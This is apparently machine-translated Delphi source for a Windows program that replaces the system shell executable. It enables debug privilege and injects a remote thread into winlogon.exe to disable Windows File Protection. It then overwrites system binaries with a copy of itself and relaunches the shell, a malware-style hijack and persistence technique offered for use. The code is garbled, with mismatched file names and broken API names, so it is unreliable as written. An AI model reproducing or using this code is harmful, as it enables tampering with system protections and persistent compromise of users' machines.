Replace assumer.exe
{*************************************** ****************}
{}
{Change xper.exe for firewall protection}
{}
{}
{*************************************** ****************}
Program Project1;
Uses
Windows, TlHelp32;
Function LowerCase (const S: string): string; // LowerCase
Var
Ch: Char;
L: Integer;
Source, Dest: PChar;
Begin
L: = Length (S );
SetLength (Result, L );
Source: = Pointer (S );
Dest: = Pointer (Result );
While L <> 0 do
Begin
Ch: = Source ^;
If (CH> = 'A') and (CH <= 'Z') Then Inc (CH, 32 );
DeST ^: = CH;
INC (source );
INC (DEST );
Dec (L );
End;
End;
Function createdmutexex (mutexname: pchar): Boolean;
VaR
Mutexhandle: DWORD;
Begin
Mutexhandle: = createmutex (nil, true, mutexname );
If mutexhandle <> 0 then
Begin
If getlasterror = error_already_exists then
Begin
// Closehandle (mutexhandle );
Result: = false;
Exit;
End;
End;
Result: = true;
End;
Function getwinpath: string; // obtain the Windows directory
VaR
Buf: array [0 .. MAX_PATH] of char;
Begin
GetWindowsDirectory (Buf, MAX_PATH );
Result: = Buf;
If Result [Length (Result)] <> '/'then Result: = Result + '/';
End;
Function GetTempDirectory: string; // get the temporary directory
Var
Buf: array [0 .. MAX_PATH] of char;
Begin
GetTempPath (MAX_PATH, Buf );
Result: = Buf;
If Result [Length (Result)] <> '/'then Result: = Result + '/';
End;
Function EnableDebugPriv: Boolean; // The Elevation of Privilege is DEBUG.
Var
HToken: THANDLE;
Tp: TTokenPrivileges;
Rl: Cardinal;
Begin
Result: = false;
Openprocesstoken (getcurrentprocess (), token_adjust_privileges or token_query, htoken );
If lookupprivilegevalue (nil, 'sedebugprivilege', TP. Privileges [0]. luid) then
Begin
TP. privilegecount: = 1;
TP. Privileges [0]. attributes: = se_privilege_enabled;
Result: = adjusttokenprivileges (htoken, false, TP, sizeof (TP), nil, rl );
End;
End;
Procedure injectthread (processhandle: DWORD); // enter winlogon.exe to disable XP File Protection
VaR
TID: longword;
Hsfc, hthread: hmodule;
Pfncloseevents: pointer;
Begin
Hsfc: = loadlibrary ('sfc _ OS. dll ');
Pfncloseevents: = getprocaddress (hsfc, makeintresource (2 ));
Freelibrary (hsfc );
HThread: = CreateRemoteThread (ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID );
WaitForSingleObject (hThread, 4000 );
End;
Procedure InitProcess (Name: string); // find the winlogon.exe process PID
Var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle: dword;
Begin
FSnapshotHandle: = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );
FProcessEntry32.dwSize: = Sizeof (FProcessEntry32 );
If Process32First (FSnapshotHandle, FProcessEntry32) then begin
Repeat
If Name = LowerCase (FProcessEntry32.szExeFile) then
Begin
ProcessHandle: = OpenProcess (PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID );
InjectThread (ProcessHandle );
CloseHandle (ProcessHandle );
Break;
End;
Until not Process32Next (FSnapshotHandle, FProcessEntry32 );
End;
CloseHandle (FSnapshotHandle );
End;
Const ExpFile = 'assumer.exe ';
MasterMutex = 'opennull ';
Var
S: string;
Begin
If not CreatedMutexEx (MasterMutex) then ExitProcess (0); // Mutually Split
If not EnableDebugPriv then Exit; // permission escalation fails to Exit
InitProcess('winlogon.exe '); // enter winlogon.exe to disable xp file protection and prevent system restoration.
S: = ParamStr (0); // get this name
If LowerCase (s) <> LowerCase (GetWinPath + ExpFile) then // The specified partition is not the same as the file name in the system.
Begin // if not
MoveFileEx (PChar (GetWinPath + ExpFile), PChar (GetWinPath + 'system32/cmd.exe '), MOVEFILE_REPLACE_EXISTING); // first move the currently running cmd.exe
CopyFile (PChar (S), PChar (GetWinPath + ExpFile), false); // copy yourself to the windows directory as erer.exe
End;
WinExec (PChar (GetWinPath + 'system32/cmder.exe '), 1); // run the real cmd.exe
End.